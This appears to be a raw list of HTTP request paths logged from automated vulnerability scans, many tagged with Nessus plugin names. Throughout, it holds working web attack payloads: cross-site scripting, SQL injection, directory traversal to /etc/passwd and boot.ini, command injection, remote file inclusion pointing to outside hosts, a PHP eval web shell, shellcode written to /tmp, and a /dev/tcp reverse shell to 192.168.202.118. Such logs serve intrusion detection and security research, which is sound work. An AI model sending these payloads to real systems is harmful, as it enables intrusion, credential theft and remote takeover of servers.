/help.php?q="rm,q11574297&rem,
/scripts/about.php
/esmozg5d.dll?<script>cross_site_scripting.nasl</script>
/javascript/footer.exe
/examples/jsp/colors/index.php?name=your account&profile=anyone"><script>alert('nessus was here');</script>
/forum-ra_professionnel.asp?n=../../boot.ini
/main.php?stuff="\x0drm\x09q16681283\x09#
//.../.../.../.../.../.../.../.../etc/passwd
/search.asp?term=<\x00script>alert('vulnerable')</script>
/cgi-bin/index.php?string='
/en-us/jnv890lt.asp?<script>cross_site_scripting.nasl</script>
/dir_thatware/config.php?root_path=http://192.168.202.96:8080/txenjrxf3?'
/javascript/redir.exe
/downloads/pafiledb.php?action=email&id=4?\"<script>alert('vulnerable')</script>\"
/en-us/i686v90l.cfc?<script>document.cookie="testfutf=1550;"</script>
/admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.118:8080/tzhfyzkbomspvm?
/main.php?logout="ping\x09-w\x0910000\x09-n\x091\x091.2.3.4|rem\x09
/x2gyorli.htm?<meta http-equiv=set-cookie content="testwhac=3130">
/vjbrrppi.html?<script>cross_site_scripting.nasl</script>
/oldscripts/
/cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1332010411
/scripts/content.php?get_action=display_doc&doc_file=credits
/j4oqyvga.htm?<script>cross_site_scripting.nasl</script>
/scripts/calendar.php?month=' union select 1,1,'1331904667','calendarix_month_sql_injection.nasl',1 #
/scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332008334','5'--
/microsoft windows html help control cross-zone scripting vulnerability/
/scripts/direct.php?rf=/etc/passwd\x00
/help.php?q='&rm\x09q78257168\x09#
/cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332009307,416096840 --
/javascript/build.exe
/main.php?stuff="ping,-w,7000,-n,1,1.2.3.4&rem,
/cacti/a1stats/a1disp3.cgi?/../../../../../../etc/passwd
/cote' content/
/main.php?stuff="rm q82735586&rem
/cgi-bin/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\x00
/panelitprof'l/
/examples/servlets/servlet/index.php?cid='
/shopper.cgi?newpage=../../../../../../etc/passwd
/javascript/mix.exe
/pfdispaly.cgi?../../../../../../etc/passwd
/php/php.exe?c:\winnt\win.ini
/ht8pn8uq.jsp?<script>cross_site_scripting.nasl</script>
/javascript/commerce.exe
/p043snfr.fts?<img src="javascript:alert(cross_site_scripting.nasl);">
/javascript/csv.exe
/session/login.php?dest=nessus"><script>alert('ossim_dest_xss.nasl')</script><!--
/scripts/rest/api/2/serverinfo
/ny1b3qq4.html?<script>cross_site_scripting.nasl</script>
/vjbrrppi.cfm?<script>cross_site_scripting.nasl</script>
/examples/jsp/jsp2/jspx/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\x00&bn=fm_d1
/examples/jsp/jsp2/jspx/zpanel.php?page=/etc/passwd\x00
/eei78ore.html?<img src="javascript:alert(cross_site_scripting.nasl);">
/scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331919009','5'--
/<meta http-equiv=set-cookie content="testbgqj=6434">
/examples/jsp/checkbox/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\x00gwextranet_template_dir_traversal.nasl
/simplebashscripttosetupdevelopmentenvironment/
/cacti/www/delivery/ac.php?bannerid=-1331909226+or+1=1+--+';passthru(base64_decode($_server[http_nessus_3mwq6imw]));die;/*
/main.php?logout="&ping\xa0-w\xa011000\xa0-n\xa01\xa04.3.2.1&rem\xa0
/sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script>
/officescan/cgi/cgichkmasterpwd.exe
/examples/servlets/servlet/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd
/en-us/account/index.php?src=1&_common=1&time=1331905227&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00
/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/sdlffngmto0+>+/dev/null+&'); function v
/j4drbkil.nsf?<img src="javascript:alert(cross_site_scripting.nasl);">
/javascript/index2.exe
/examples/jsp/checkbox?username="<script>foo</script
/javascript/zencart.exe
/javascript/support.exe
/manager/store.php?crn=42'&action=show&show_products_mode=cat_click
/scripts/sc877q2pzqne.cgi
/scripts/qcvjnagy16kc.pl
/m4kkjf8l.cfc?<meta http-equiv=set-cookie content="testyglc=8988">
/bxnyrhmh.kspx?<meta http-equiv=set-cookie content="testmjct=1867">
/ap58k3ci.pl?<script>cross_site_scripting.nasl</script>
/um7xpn15.cgi?<meta http-equiv=set-cookie content="testotoy=6142">
/g8nu2yy7.php3?<img src="javascript:alert(cross_site_scripting.nasl);">
/zv8tv7h8.asp?<script>document.cookie="testcqwz=9752;"</script>
/cgi-perl/sawmill?rfcf+"sawmillinfo/sawmillpassword"+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
/main.php?logout=;del\x09q14218261\x09#
/examples/jsp/jsp2/jspxsearch-results.dot?search_query=nessus"><script>alert('dotcms_search_query_xss.nasl')</script>/
/javascript/1.exe
/awstats/awstats.pl?migrate=|echo;/bin/echo -en "vj\0001j\0002\0211\0341j\0001jfx\0133\0315\0200\0222" >> /tmp/qcywjpzuja0;echo|awstats654145.txt
/examples/jsp/cal/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='
/javascript/log4net.exe
/smg_smxcfg30.exe?vcc=3560121183d3
/twiki/bin/view/main/twikiusers?rev=75401 `0<&66-;exec 66<>/dev/tcp/192.168.202.118/26121;sh <&66 >&66 2>&66`#
/top.php?stuff="ver&rem\x09
/cal_week.php?op=week&catview=999'
/jscript/
/8x6w469u.fts?<meta http-equiv=set-cookie content="testgfjr=1286">
/top.php?stuff="\x0ddel\x09q29585118\x09#
/um7xpn15.do?<meta http-equiv=set-cookie content="testotoy=6142">
/top.php?stuff='\x0auname\x09#
/scripts/webboard/generate.cgi
/ewc3rz1l.fts?<script>document.cookie="testkgqo=204;"</script>
<script>document.cookie="testblcp=8120;"</script>
/fa8p8lr8.jsp?<img src="javascript:alert(cross_site_scripting.nasl);">
/index.php?msgs=<script>alert(414575596937)</script>
/top.php?stuff=ping;-w;8000;-n;1;1.2.3.4&rem;
/javascript/tmp.exe
/examples/servlets/servlet/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd|
/en-us/account/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\x00
/recordings/cgi/tseekdir.cgi?location=/etc/passwd\x00
/<?php eval($_post['q71722863']);?>
/javascript/catalyst.exe
/help.php?q="&ping,-w,8000,-n,1,1.2.3.4&rem,
/examples/servlets/servlet/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\x00.jpg
/javascript/.passwd.java
/main.php?frm_daynight=day&frm_passwd=q74166941&frm_referer=http%3a//192.168.23.202/&frm_user=&scr_height=&scr_width=
/prescription-vicodin/
/iktok2bw.html?<script>cross_site_scripting.nasl</script>
/0u75ldxq.cfc?<script>cross_site_scripting.nasl</script>
/s7qus4g3.pl?<script>cross_site_scripting.nasl</script>
/7dbjwpw6.php?<script>cross_site_scripting.nasl</script>
/1r8cfrlf.dll?<meta http-equiv=set-cookie content="testydan=5106">
/main.php?stuff="ping -w 7000 -n 1 1.2.3.4&rem
/h5sc3gxy.cgi?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/jsp2/el/wikka.php?wakka=homepage/../../actions/wikkachanges
/examples/jsp/jsp2/el/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\x00
/ygkjkngd.fts?<script>document.cookie="testnago=4518;"</script>
/w4996nr0.x?<meta http-equiv=set-cookie content="testttvs=7163">
/en-us/esmozg5d.mscgi?<script>cross_site_scripting.nasl</script>
/0rufe52p.cgi?<img src="javascript:alert(cross_site_scripting.nasl);">
/ap58k3ci.html?<script>cross_site_scripting.nasl</script>
/replicas.exe
/recordings/welcome.php?custom_welcome_page=/etc/passwd\x00
/subscription-agreement/
/main.php?stuff=\x0auname\x09>q55874964\x09#
/scripts/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='
/tukodz3j.idc?<img src="javascript:alert(cross_site_scripting.nasl);">
/javascript/proc.exe
/1qwv2p5p.fts?<script>document.cookie="testvqcy=252;"</script>
/eei78ore.htm?<img src="javascript:alert(cross_site_scripting.nasl);">
/top.php?stuff="del q83491369 #
/include/scripts/export_batch.inc.php?dir=http://192.168.202.96:8080/4dckqcc0acprbz?
/recordings/index.php?show=/etc/passwd
/officescan/console/remoteinstallcgi/cgiremoteinstall.exe
/cgi-bin/download.php?language=/etc/passwd\x00
/bl8sefdm.aspx?<script>cross_site_scripting.nasl</script>
/javascript/paypal.exe
/bc van 't hul/
/help.php?q='\x0auname >q61886362 #
/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+dir
/m2fpztty.idc?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/cal/core/editor.php?editor_insert_bottom=/etc/passwd
/examples/jsp/sessions/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo
/phpwebsite/index.php?module=pagemaster&page_user_op=view_page&page_id=10\"><script>alert('vulnerable')</script>&mmn_position=[x:x]
/top.php?stuff="&ping -w 8000 -n 1 1.2.3.4&rem
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php%3fstuff%3d2040844887&frm_user=&scr_height=&scr_width=q77188379
/scripts/nquser.php
/<script>document.cookie="testtpby=7052;"</script>
/iktok2bw.jsp?<img src="javascript:alert(cross_site_scripting.nasl);">
/cgis/cgi-test.exe
/cacti/index.php?user_langue=../../../../../../../../../../etc/passwd
/rpxyx07v.php?<meta http-equiv=set-cookie content="testbnli=1975">
/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331908709')</script>
/?<meta http-equiv=set-cookie content="testwtbo=4831">
/cgi.cgi/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe
/manager/themes/program/themesettings.inc.php?themesdir=/etc/passwd\x00
/examples/jsp/error/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 --
/j4rdyhw8.aspx?<script>document.cookie="testrluj=1420;"</script>
/cgi-bin/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 --
/static//..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
/javascript/dummy.exe
/examples/jsp/jsp2/jspx/rot13sj.cgi?/etc/passwd
/um7xpn15.html?<meta http-equiv=set-cookie content="testotoy=6142">
/..\pixfir~1\how_to_login.html
/src/read_body.php?mailbox=<script>alert(vulnerable)</script>&passed_id=<script>alert(vulnerable)</script>&startmessage=1&show_more=0
/cgi-bin/phf?qalias=x\x0a/bin/cat /etc/passwd
/scripts/acp/index.php
/help.php?q="|ping\x0b-w\x0b10000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b
/javascript/products.exe
/help.php?q="\x0adel q51358327 #
/b4vng02k.nsf?<meta http-equiv=set-cookie content="testtrlh=3672">
/recordings/print.php?what=article&id='
/javascript/init.exe
/health-prescription/
/ny1b3qq4.aspx?<img src="javascript:alert(cross_site_scripting.nasl);">
/valentine's-day/
/entrylevelmedicaltranscriptionjobs/
/scripts/calendar.php?month=' union select 1,1,'1331904225','calendarix_month_sql_injection.nasl',1 #
/33y9gcqq.do?<meta http-equiv=set-cookie content="testnvxc=4301">
/scripts/tinfo.php?id=1331909289
/n1afe1y6.cfc?<img src="javascript:alert(cross_site_scripting.nasl);">
/wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>
/b1q8bywu.do?<img src="javascript:alert(cross_site_scripting.nasl);">
/eg2u8pbv.cfc?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/cal/?"><script>alert('struts_sa_surl_xss.nasl')</script>
/examples/jsp/jsp2/el/protection.php?action=logout&siteurl=/etc/passwd
/en-us/account/index.php?id='union/**/select/**/0,0,1431582502,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+ver
/d5a5renl.php?<img src="javascript:alert(cross_site_scripting.nasl);">
/forum1_professionnel.asp?n=1771&nn=/../../../../../../../../etc/passwd&page=1
/cacti/store.php?crn=42'&action=show&show_products_mode=cat_click
/javascript/.passwd.tar.gz
/examples/jsp/cal/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\x00&bn=fm_d1
/ny1b3qq4.htm?<img src="javascript:alert(cross_site_scripting.nasl);">
/javascript/recorded.exe
/phonehome_script.exe
/qhvu0pdg.aspx?<script>document.cookie="testchuc=2100;"</script>
/javascript/all-wcprops.exe
/prescriptions/
/sign.exe
/snippetmaster/includes/vars.inc.php?_session[script_path]=http://cirt.net/rfiinc.txt??
/javascript/wicket.exe
/main.php?stuff="rm\x0cq45919726&rem\x0c
/javascript/galleries.exe
/top.php?stuff="uname >q69198385 #
/cgi-perl/query?mss=../config
/manual/programs/htpasswd.html
/l13b77e5.dll?<meta http-equiv=set-cookie content="testjvvf=7721">
/scripts/root.exe?/c+dir+c:\+/og
/examples/jsp/num/_head.php?_zb_path=../../../../../../../../../../etc/passwd\x00
/subscriptions.css
/miz4r5hz.pl?<meta http-equiv=set-cookie content="testviqu=1270">
/main.php?logout="ver;>q97754931&rem;
/<script>alert('nessus:tomcat_3_2_2.nasl-1331923741')</script>.jsp
/5o9zq43e.html?<script>cross_site_scripting.nasl</script>
/examples/jsp/colorsfaq.php?skin=../../admin/manager&tplpath=admin
/subscriptions.sql
/sudoscript/
/javascript/id.exe
ftp://192.168.25.202/*<apache_mod_proxy_ftp_glob_xss.nasl>
/cgibin/pfdisplay.cgi?'\x0a/bin/cat /etc/passwd|'
/u95h6ymu.php?<script>document.cookie="testkhwc=4028;"</script>
/top.php?stuff="rm\x09q73669717\x09#
/top.php?stuff='del\x09q68811991\x09#
<meta http-equiv=set-cookie content="testtkio=5454">
/javascript/students.exe
/cgi-bin/newsscript.pl?mode=admin
/examples/jsp/cal/whois.cgi?action=load&whois=;id
/examples/jsp/colors/index.php?page=/etc/passwd\x00
/opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.96:8080/llumt7msyau5y?\x00
/8x6w469u.jsp?<script>document.cookie="testgfjr=1286;"</script>
/cgi-bin/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\x00
/javascript/headers.exe
/windowsscripting/
/ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.96:8080/txenjrxf3?'
/<meta http-equiv=set-cookie content="testftxz=5980">
/javascript/fcgi.exe
/javascript/egress.exe
/o35zot2r.php3?<script>cross_site_scripting.nasl</script>
/speakers'_corner/
/scripts/index.php?act=sm_window&page=event&day=-1 union select 1,1332009307,1854936082 --
/en-us/esmozg5d.aspx?<script>cross_site_scripting.nasl</script>
/examples/jsp/sessions/user.cgi?url="><script>alert("gossamer_links_url_xss.nasl");</script>&from=add
/nyvbv05h.jspa?<meta http-equiv=set-cookie content="testftxz=5980">
/javascript/.passwd.o
/index.php?do=index&dummy=dummy');alert('414036083539');void('
/j734qobz.kspx?<img src="javascript:alert(cross_site_scripting.nasl);">
/main.php?logout="ping,-w,8000,-n,1,4.3.2.1&rem,
/javascript/apis.exe
/ny1b3qq4.jspa?<img src="javascript:alert(cross_site_scripting.nasl);">
/testingcgiscripts/
/index.php?action=item&id="><script>alert("414405594704");</script>
/en-us/esmozg5d.htm?<img src="javascript:alert(cross_site_scripting.nasl);">
/pxagj7n7.exe?<script>cross_site_scripting.nasl</script>
/javascript/.htpasswd.sfish/'"'"'"'"
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+a+fa+>>esbq
/javascript/phpmyadmin.exe
/mpcgi/r.cgi?file=../../../../../../../../../../etc/passwd
/javascript/play.exe
/j4rdyhw8.exe?<script>document.cookie="testrluj=1420;"</script>
/subscription_agreement/
/main.php?logout='del\x09q59958199\x09#
/examples/jsp/jsp2/el/texis.exe/nessus
/q703m78q.jsp?<script>document.cookie="testvowq=604;"</script>
/preview.php?php_script_path=http://192.168.202.118:8080/2aibfaczmac8??&cmd=dir
/scripts/embed/day.php?path=/etc/passwd\x00
/../.tar
/recordings/sojourn.cgi?cat=../../../../../etc/passwd\x00
/3rdparty/phpmyadmin/export.php?what=../../../../../../../../../../../../etc/passwd\x00
/s7qus4g3.cfc?<script>cross_site_scripting.nasl</script>
/examples/jsp/error/sgdynamo.exe?htname=sgdynamo.exe
/scripts/rss.scr.php?globals[pth][classes]=http://cirt.net/rfiinc.txt??
/o1zj4u9v.htm?<script>document.cookie="testabrn=6368;"</script>
/javascript/document.mdb
/manager/download.php?language=/etc/passwd\x00
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+a+1f4+>>esbq
/0w155a7c.do?<img src="javascript:alert(cross_site_scripting.nasl);">
/cgi-bin/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00.txt
/remindpasswd
/de3v2dd9.php?<script>cross_site_scripting.nasl</script>
/examples/jsp/numsearch_results.dot?search_query=nessus"><script>alert('dotcms_search_query_xss.nasl')</script>/
/cgi-bin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1332010394')</script>
/main.php?stuff="del q82735586&rem
/y8pmygrp.jsp?<img src="javascript:alert(cross_site_scripting.nasl);">
/fcgi-bin/fileseek.cgi?foot=;cat /etc/passwd&head=
/psynch/nph-psf.exe?css=@rfiurl
/main.php?stuff="\x0adel q45664393 #
/scripts/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini
/fc9t54l7.pl?<meta http-equiv=set-cookie content="testggad=2000">
/examples/jsp/colors/source?v=../../../../../../../../../../etc/passwd\x00
/children's_museums/
/scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1332009308,1,1510172050--
/9ko6m4c8.nsf?<meta http-equiv=set-cookie content="testylik=3403">
/cgibin/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=
/rpxyx07v.cfm?<meta http-equiv=set-cookie content="testbnli=1975">
/cgibin/r.cgi?file=../../../../../../../../../../etc/passwd
/esmozg5d.nsf?<img src="javascript:alert(cross_site_scripting.nasl);">
/netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>
/javascript/bigip.exe
/phpmyadmin/mail.php?id='/**/union/**/select/**/1,2,1331923205,4--&blog=1
/azcrfs8d.fts?<script>document.cookie="testjpdr=9205;"</script>
/ht8pn8uq.asp?<img src="javascript:alert(cross_site_scripting.nasl);">
/scripts/sc877q2pzqne.inc
/examples/jsp/jsp2/el/gadgets/blog/blogmodel.php?path=/etc/passwd\x00
/help.php?q=;uname\x09>q36511176\x09#
/help.php?q=&ver&rem;
/phpmyadmin/search/show.pl?url=file:/etc/passwd
/169okeyj.cfm?<meta http-equiv=set-cookie content="testxeoi=3573">
/main.php?stuff="\x0drm q98657175 #
/shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>
/help.php?q="rm\xa0q71425977&rem\xa0
/phpmyadmin/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\x00
/ygkjkngd.jspa?<script>document.cookie="testnago=4518;"</script>
/en-us/account/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini
/33y9gcqq.php3?<meta http-equiv=set-cookie content="testnvxc=4301">
/jdx255ea.x?<script>document.cookie="testziyq=5055;"</script>
/main.php?stuff="rm\xa0q33347165&rem\xa0
/javascript/restored.exe
/scripts/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\x00
/j2kdmfw4.dll?<script>cross_site_scripting.nasl</script>
/j4drbkil.do?<img src="javascript:alert(cross_site_scripting.nasl);">
/readmore.php?config["sipssys"]=http://192.168.202.118:8080/tzhfyzkbomspvm?
/imprimer.asp?no=/etc/passwd\x00|44|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'/'.
/scripts/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold
/azcrfs8d.exe?<meta http-equiv=set-cookie content="testjpdr=9205">
/cgi-bin/common.php?f=0&forumlang=../../../../../../../../../../etc/passwd
/occam's_razor/
/bmeun223.cgi?<meta http-equiv=set-cookie content="testhhwu=7044">
/scripts/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl
/vmi8bb12.cfm?<meta http-equiv=set-cookie content="testlerc=2575">
/qhvu0pdg.idc?<script>document.cookie="testchuc=2100;"</script>
/en-us/oie504mr.aspx?<meta http-equiv=set-cookie content="testtpby=7052">
/ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini
/vwmg565s.idc?<script>cross_site_scripting.nasl</script>
/examples/jsp/error/nslookup.cgi?query=localhost;id&type=any&ns=
/u95h6ymu.cgi?<meta http-equiv=set-cookie content="testkhwc=4028">
<script>document.cookie="testsbvw=6289;"</script>
/phpmyadmin/faq.php?action=&type=view&s=&id=-1' union select 0,1385926503,0,0,0,0,0--
/fcgi-bin/sensepost.exe?/c+dir
/m4kkjf8l.idc?<script>document.cookie="testyglc=8988;"</script>
/javascript/.htpasswd.sfish/2147483648
/scaffoldscript/
/fa8p8lr8.pl?<img src="javascript:alert(cross_site_scripting.nasl);">
/download.php?language=/etc/passwd\x00
/scgi-bin/pfdisplay.cgi?'\x0a/bin/cat /etc/passwd|'
/help.php?q="&uname\x09>q13543643\x09#
/bn857frh.x?<script>cross_site_scripting.nasl</script>
/6n7aacgg.exe?<script>cross_site_scripting.nasl</script>
/examples/jsp/colors/more.php?id=1'
//<body><script src=http://www.example.com/test?rnd=q92694241></script>
../../../../../../../etc/passwd
/scripts/user.cgi?url="><script>alert("gossamer_links_url_xss.nasl");</script>&from=add
/cacti/fxm.exe
/s7qus4g3.fts?<img src="javascript:alert(cross_site_scripting.nasl);">
/ywaxntrx.aspx?<script>cross_site_scripting.nasl</script>
/scripts/lce0cbkfb8xx.sh
<meta http-equiv=set-cookie content="testqpux=4016">
/vhscript-0/
/javascript/.htaccess/"`true`"
/vwmg565s.asp?<img src="javascript:alert(cross_site_scripting.nasl);">
/en-us/esmozg5d.cfm?<img src="javascript:alert(cross_site_scripting.nasl);">
/q703m78q.cfc?<meta http-equiv=set-cookie content="testvowq=604">
/cgi-bin/user.cgi?url="><script>alert("gossamer_links_url_xss.nasl");</script>&from=add
/javascript/up.exe
ftp://192.168.21.253/*<apache_mod_proxy_ftp_glob_xss.nasl>
/en-us/esmozg5d.asp?<script>cross_site_scripting.nasl</script>
/sendtemp.pl?templ=../../../../../etc/passwd
/phpmyadmin/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\x00
/snakesandrubiestranscript/
/pxagj7n7.nsf?<script>cross_site_scripting.nasl</script>
/examples/jsp/sessions/cgiip.exe/wservice=wsbroker1/webutil/ping.p
/latestvirusdescriptions/
/cgi-914/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
/scripts/gdxlwjnlsr6i.html
/javascript/sitemap.exe
/6wb70v0b.mscgi?<img src="javascript:alert(cross_site_scripting.nasl);">
/oie504mr.pl?<meta http-equiv=set-cookie content="testtpby=7052">
/en-us/static/@95063:81/app/launcher/scripts/tabify.js?_=1331994897912
/en-us/oie504mr.php?<script>document.cookie="testtpby=7052;"</script>
/6qbynt4f.exe?<script>cross_site_scripting.nasl</script>
/script_path/config.inc.php?_path=http://192.168.202.96:8080/swgnhpydbq0t??
/33y9gcqq.idc?<script>document.cookie="testnvxc=4301;"</script>
/phpmyadmin/lang/lang.php?lang_path=/etc/passwd\x00
/fpnpp5zg.php?<script>document.cookie="testyias=101;"</script>
/h5sc3gxy.kspx?<img src="javascript:alert(cross_site_scripting.nasl);">
/scripts/rx9ysf2iwv4j.shtml
/main.php?stuff="&rm\xa0q39243847&rem\xa0
/gy23xnjq.cfc?<script>cross_site_scripting.nasl</script>
/b1q8bywu.aspx?<script>cross_site_scripting.nasl</script>
/1r8cfrlf.mscgi?<script>document.cookie="testydan=5106;"</script>
/1qwv2p5p.nsf?<meta http-equiv=set-cookie content="testvqcy=252">
/examples/jsp/jsp2/el/lib/authform.inc.php?path_pre=/etc/passwd\x00
/news_scripts/
/examples/jsp/sessions/includes/converter.inc.php?include_path=/etc/passwd\x00
/de3v2dd9.cfc?<img src="javascript:alert(cross_site_scripting.nasl);">
/javascript/append.exe
/examples/jsp/checkbox/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd
/help.php?q="&rm\x09q13287114\x09#
/javascript/shopping.exe
/zln2hm2z.cgi?<script>document.cookie="testblcp=8120;"</script>
/examples/jsp/error/index.php?templates_dir=/etc/passwd\x00
/javascript/document.conf
/help.php?q="&del\xa0q59981564&rem\xa0
/phpmyadmin/more.php?id=1'
/j4rdyhw8.jsp?<meta http-equiv=set-cookie content="testrluj=1420">
/javascript/manual.exe
/rpxyx07v.nsf?<meta http-equiv=set-cookie content="testbnli=1975">
/sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script>
/path_script/createurl.php?formurl=http://192.168.202.96:8080/frznctvhi0i5?
/de3v2dd9.cfc?<script>cross_site_scripting.nasl</script>
/scripts/udblphlq4nln.pl
/subscriptions.class
/news.php?config[script_path]=http://192.168.202.118:8080/moclyxlwqyfjnp??
/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908691&lang_crm=../../vtigerservice.php\x00
/examples/jsp/jsp2/jspxsearch_results.dot?search_query=nessus"><script>alert('dotcms_search_query_xss.nasl')</script>/
/ script>alert document.secin.password.value /script>
/examples/servlets/servlet/nessus"><script>alert('mod_perl_status_uri_xss.nasl')</script>
/u8yiqilu.php3?<meta http-equiv=set-cookie content="testswjp=6010">
/examples/jsp/error/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd
/raanw4ia.dll?<script>cross_site_scripting.nasl</script>
/help.php?q="\x0drm q75726259 #
/towels-0.1/src/scripture.php?pageheaderfile=http://cirt.net/rfiinc.txt?
/examples/jsp/colors/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\x00
/h4bi26jd.asp?<script>document.cookie="testhrzx=1150;"</script>
/admin/admin.php?sid='
/examples/jsp/num/sources/functions.php?root_path=/etc/passwd\x00
/main.php?stuff=ver\x0b>q55597274&rem\x0b
/forum1.asp?n=1753&nn=/etc/passwd\x00
/subscriptions.swf
/javascript/government.exe
/cgi/fileseek2.cgi?foot=;cat /etc/passwd&head=
/cfscript/
/main.php?logout="&del q63418787&rem
/"<script>alert("xss")</script>
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/&frm_user=&scr_height=q78911548&scr_width=
/main.php?stuff="&ping\x0b-w\x0b11000\x0b-n\x0b1\x0b4.3.2.1&rem\x0b
/g3w7y7u5.nsf?<meta http-equiv=set-cookie content="testbfpq=3326">
/phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+\x00\"><script>alert('vulnerable')</script>
/javascript/on.exe
/examples/jsp/error/sawmill6cl.exe?ho+{complete_version}
/cgi-win/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\x00
/ybz5rz7a.dll?<meta http-equiv=set-cookie content="testsbvw=6289">
/remindpasswd/
/uvazfs7p.mscgi?<meta http-equiv=set-cookie content="testwtbo=4831">
/scripts/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331908852
/javascript/jpa.exe
/?<meta http-equiv=set-cookie content="testkwlg=5591">
/javascript/document.so
/nuh3zirz.jsp?<script>cross_site_scripting.nasl</script>
/<img src="javascript:alert(cross_site_scripting.nasl);">.html
/javascript/.passwd.bak
/filedetails.php?path=</title><script>alert(414215590327)</script>
/javascript/asdf.exe
/l4fz1dqw.exe?<img src="javascript:alert(cross_site_scripting.nasl);">
/digital-subscriptions/
/javascript/document.jsf
/sportsman's/
/yef5f3d5.htm?<script>document.cookie="testcrcv=6167;"</script>
/examples/jsp/jsp2/el/session/login.php?dest=nessus"><script>alert('ossim_dest_xss.nasl')</script><!--
/top.php?stuff="|ping\x0b-w\x0b7000\x0b-n\x0b1\x0b1.2.3.4|rem\x0b
/my sister's hot friend - eve vivian/
/tvcs/getservers.exe?action=selects1
/javascript/cpanel.exe
/33y9gcqq.aspx?<meta http-equiv=set-cookie content="testnvxc=4301">
/main.php?logout=1' and 1=1 and ''<>'kxshru8u
/javascript/htpasswd.meta
/examples/jsp/jsp2/el/index.php?user_langue=../../../../../../../../../../etc/passwd
/help.php?q="ver;>q43131815&rem;
/fc9t54l7.htm?<meta http-equiv=set-cookie content="testggad=2000">
/examples/jsp/jsp2/el/cal_make.pl?p0=../../../../../../../../../etc/passwd\x00
/<meta http-equiv=set-cookie content="testhhwu=7044">
/support/common.php?f=0&forumlang=../../../../../../../../../../etc/passwd
/606wkcop.cfc?<script>cross_site_scripting.nasl</script>
/scripts/index.php?entry='
/main.php?logout='\x0duname\x09#
/javascript/traffic.exe
/nyvbv05h.cfc?<script>document.cookie="testftxz=5980;"</script>
/examples/jsp/colors/login.php?course="><script>alert(atutor_xss.nasl)</script>
/javascript/devices.exe
/7u1pb2xi.exe?<meta http-equiv=set-cookie content="testlwwz=718">
/scripts/admin/login/index.php
/scripts/login.pl
/xsqln7eb.dll?<script>document.cookie="testpcbb=9254;"</script>
/cgis/r.cgi?file=../../../../../../../../../../etc/passwd
/help.php?q="&sleep 11 #
/en-us/hipkz026.htm?<meta http-equiv=set-cookie content="testyrbs=2855">
/main.php?logout=";del\x09q14876269\x09#
